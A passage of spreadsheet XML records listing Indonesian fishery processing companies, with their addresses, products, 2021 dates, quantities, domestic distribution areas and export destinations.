    <s v="China, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="23686"/>
    <x v="901"/>
    <s v="CV. VELINDO MANDIRI"/>
    <s v="Jl. Raya Pati - Juwana Km. 7 Dk. Guyangan, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Surimi Beku"/>
    <d v="2021-04-30T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati"/>
    <m/>
  </r>
  <r>
    <n v="23687"/>
    <x v="902"/>
    <s v="PT. PUTRI INDAH"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan Gabion No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="1579400"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23688"/>
    <x v="902"/>
    <s v="PT. PUTRI INDAH"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan Gabion No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Swanggi, Bawal, Malong, Biji Nangka, Kerapu, Layur, Beloso, Kurisi)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="6456479"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23689"/>
    <x v="902"/>
    <s v="PT. PUTRI INDAH"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan Gabion No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Kembung, Salem, Aso-aso, Tenggiri)"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="534000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23690"/>
    <x v="902"/>
    <s v="PT. PUTRI INDAH"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan Gabion No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="1200"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23691"/>
    <x v="903"/>
    <s v="ERWINA"/>
    <s v="Jl. Ikan Nila RT 02 RW 02 Pekon, Kel. Pagelaran, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Abon Lele"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="1300"/>
    <s v="Kabupaten Pringsewu"/>
    <m/>
  </r>
  <r>
    <n v="23692"/>
    <x v="903"/>
    <s v="ERWINA"/>
    <s v="Jl. Ikan Nila RT 02 RW 02 Pekon, Kel. Pagelaran, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Baby Fish"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="600"/>
    <s v="Kabupaten Pringsewu"/>
    <m/>
  </r>
  <r>
    <n v="23693"/>
    <x v="903"/>
    <s v="ERWINA"/>
    <s v="Jl. Ikan Nila RT 02 RW 02 Pekon, Kel. Pagelaran, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Stik Lele"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="600"/>
    <s v="Kabupaten Pringsewu"/>
    <m/>
  </r>
  <r>
    <n v="23694"/>
    <x v="903"/>
    <s v="ERWINA"/>
    <s v="Jl. Ikan Nila RT 02 RW 02 Pekon, Kel. Pagelaran, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Lele Crispy"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="800"/>
    <s v="Kabupaten Pringsewu"/>
    <m/>
  </r>
  <r>
    <n v="23695"/>
    <x v="850"/>
    <s v="PT, YOBEL UTAMA SEAFOOD INDONESIA"/>
    <s v="Jl, Keramat Basirih No,36, Kel, Basirih, Kec, Banjarmasin Barat, Kota Banjarmasin&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Beku"/>
    <d v="2021-03-09T00:00:00"/>
    <n v="350000"/>
    <s v="Kabupaten Sidoarjo"/>
    <s v="China, Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23697"/>
    <x v="904"/>
    <s v="PT. ASIA SEJAHTERA MINA"/>
    <s v="Jl. Ir. Sutami No.24 Kawasan Logistik Terpadu Blok A1, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="700"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23698"/>
    <x v="905"/>
    <s v="PT. AGRO BOGA UTAMA"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="72990"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Pontianak, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23699"/>
    <x v="905"/>
    <s v="PT. AGRO BOGA UTAMA"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Kod, Halibut, Makerel, Salem, Sarden)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="394000"/>
    <s v="Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sumedang, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23700"/>
    <x v="905"/>
    <s v="PT, AGRO BOGA UTAMA"/>
    <s v="Jl, Kavling DPR No,181 RT 003 RW 004, Kel, Serua, Kec, Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="285790.34000000003"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Semarang, Kota Surabaya, Kota Pontianak, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23703"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Masak Beku"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Pusat, Kota Yogyakarta, Kota Surabaya"/>
    <s v="Japan, Netherlands, Singapore, Thailand, United States"/>
  </r>
  <r>
    <n v="23704"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Sidat, Bandeng, Bawal, Nila)"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Australia, Singapore"/>
  </r>
  <r>
    <n v="23705"/>
    <x v="596"/>
    <s v="PT. IROHA SIDAT INDONESIA"/>
    <s v="Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Segar (Lele, Sidat, Bawal, Nila)"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Australia, Singapore"/>
  </r>
  <r>
    <n v="23706"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23707"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abalone Kering"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23708"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cacing Laut Kering"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Timur, Kabupaten Gresik, Kota Surabaya"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23709"/>
    <x v="906"/>
    <s v="PT. SAFARI SETIA INDONESIA"/>
    <s v="Jl. Pembangunan 2 No.33 RT 001 RW 001, Kel. Batu Sari, Kec. Batu Ceper, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Tangerang, Kota Serang"/>
    <m/>
  </r>
  <r>
    <n v="23710"/>
    <x v="906"/>
    <s v="PT. SAFARI SETIA INDONESIA"/>
    <s v="Jl. Pembangunan 2 No.33 RT 001 RW 001, Kel. Batu Sari, Kec. Batu Ceper, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Lemuru, Makerel, Salem)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Pandeglang, Kabupaten Serang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23711"/>
    <x v="906"/>
    <s v="PT. SAFARI SETIA INDONESIA"/>
    <s v="Jl. Pembangunan 2 No.33 RT 001 RW 001, Kel. Batu Sari, Kec. Batu Ceper, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23712"/>
    <x v="907"/>
    <s v="PT. ANUGRAH SAMUDERA PESAKA"/>
    <s v="Griya Idola Industrial Blok A No.11, Jl. Raya Serang Km 12, Kel. Dukuh, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Dimsum, Cakwe, Dumpling, Siomay, Lumpia, Hakao)  "/>
    <d v="2021-03-03T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23713"/>
    <x v="907"/>
    <s v="PT. ANUGRAH SAMUDERA PESAKA"/>
    <s v="Griya Idola Industrial Blok A No.11 Jl. Raya Serang KM.12 KP. Pabuaran, Kel. Dukuh, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23716"/>
    <x v="908"/>
    <s v="MINIPLANT JAKA TINGKIR (PT. KELOLA MINA LAUT)"/>
    <s v="Desa Serangan RT 01 RW 01, Kec. Bonang, Kabupaten Demak&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23717"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="11000000"/>
    <s v="Kabupaten Lampung Barat, Kabupaten Tasikmalaya, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Tuban, Kabupaten Gresik"/>
    <s v="Japan, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="23722"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Surimi Beku"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="4400000"/>
    <s v="Kabupaten Rembang, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Lamongan, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23726"/>
    <x v="910"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.3.1, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23727"/>
    <x v="910"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.3.1, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23728"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tembang, Kembung, Selar, Layang)"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23729"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Biji Nangka, Kerapu, Layur, Halibut, Coklatan, Beloso, Kakap, Ayam-ayam, Kurisi, Tonang, Sebelah)"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="24000000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23730"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Pari Beku"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="6000000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23731"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita)"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="6000000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23732"/>
    <x v="911"/>
    <s v="PT, SARANA TANI PRATAMA"/>
    <s v="Jl, KUD Mina Karya Dsn Kelapan Balian, Kel, Pengambengan, Kec, Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sarden Kaleng"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="2275000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo"/>
    <s v="South Africa"/>
  </r>
  <r>
    <n v="23733"/>
    <x v="911"/>
    <s v="PT, SARANA TANI PRATAMA"/>
    <s v="Jl, KUD Mina Karya Dsn Kelapan Balian, Kel, Pengambengan, Kec, Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tepung Ikan"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="26409430"/>
    <s v="Kabupaten Banyuwangi"/>
    <s v="Japan, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="23734"/>
    <x v="909"/>
    <s v="PT. QL HASIL LAUT"/>
    <s v="Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Kue Ikan Vegie, Chikuwa, Sandwich Ikan, Tahu Seafood, Bar Ikan, Roll Ikan, Stik Kepiting) "/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1825000"/>
    <s v="Kota Medan, Kota Padang, Kota Palembang, Kabupaten Lampung Selatan, Kota Batam, Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Purwakarta, Kabupaten Bekasi, Kota Bandung, Kabupaten Rembang, Kota Semarang, Kota Yogyakarta, Kabupaten Tulungagung, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Tuban, Kabupaten Lamongan, Kota Malang, Kota Surabaya, Kota Batu, Kota Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23735"/>
    <x v="912"/>
    <s v="PT. HANLA WASHING"/>
    <s v="Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Bernilai Tambah Beku"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="23736"/>
    <x v="912"/>
    <s v="PT. HANLA WASHING"/>
    <s v="Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Bernilai Tambah Beku"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23737"/>
    <x v="912"/>
    <s v="PT. HANLA WASHING"/>
    <s v="Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="China, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23738"/>
    <x v="912"/>
    <s v="PT. HANLA WASHING"/>
    <s v="Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, Japan, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23739"/>
    <x v="912"/>
    <s v="PT. HANLA WASHING"/>
    <s v="Jl. Tugu Wijaya IV No.13, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23740"/>
    <x v="913"/>
    <s v="CV. KALDERA INTERNATIONAL TRADE"/>
    <s v="Jl. Cabe V No. 52 A, Kel. Pondok Cabe, Kec. Pamulang , Kota Tangerang Selatan&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Kering"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="American Samoa, China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23743"/>
    <x v="914"/>
    <s v="PT. TUJUH SAMUDERA JAYA"/>
    <s v="Jl. Homebase Armed, Kel. Nirannuang, Kec. Bontomarannu, Kabupaten Gowa&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="70000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23744"/>
    <x v="914"/>
    <s v="PT. TUJUH SAMUDERA JAYA"/>
    <s v="Jl. Homebase Armed, Kel. Nirannuang, Kec. Bontomarannu, Kabupaten Gowa&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23745"/>
    <x v="915"/>
    <s v="PT. ANUGERAH SARI LAUT"/>
    <s v="Jl. Gatot Subroto, Lingkungan II, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="3600000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="23746"/>
    <x v="172"/>
    <s v="PT. INDO LAUTAN MAKMUR"/>
    <s v="Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23747"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Beku"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kabupaten Banyuwangi, Kota Surabaya, Kota Makassar"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23748"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Segar"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kabupaten Gresik, Kota Surabaya, Kota Banjarmasin"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23749"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakatua, Bawal, Kakap, Kuro, Kurisi, Barramundi)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23750"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakatua, Bawal, Kakap, Kuro, Kurisi, Barramundi)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23751"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Pelagis Beku (Lemadang, Cakalang, Tenggiri)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23752"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Pelagis Segar (Lemadang, Cakalang, Tenggiri)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23753"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23754"/>
    <x v="916"/>
    <s v="PT. ALVINDO MITRA MANDIRI"/>
    <s v="Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23755"/>
    <x v="88"/>
    <s v="PT. BALI MAYA PERMAI FOOD CANNING INDUSTRY"/>
    <s v="Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tepung Ikan"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="440950"/>
    <s v="Kabupaten Jembrana"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23756"/>
    <x v="88"/>
    <s v="PT. BALI MAYA PERMAI FOOD CANNING INDUSTRY"/>
    <s v="Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
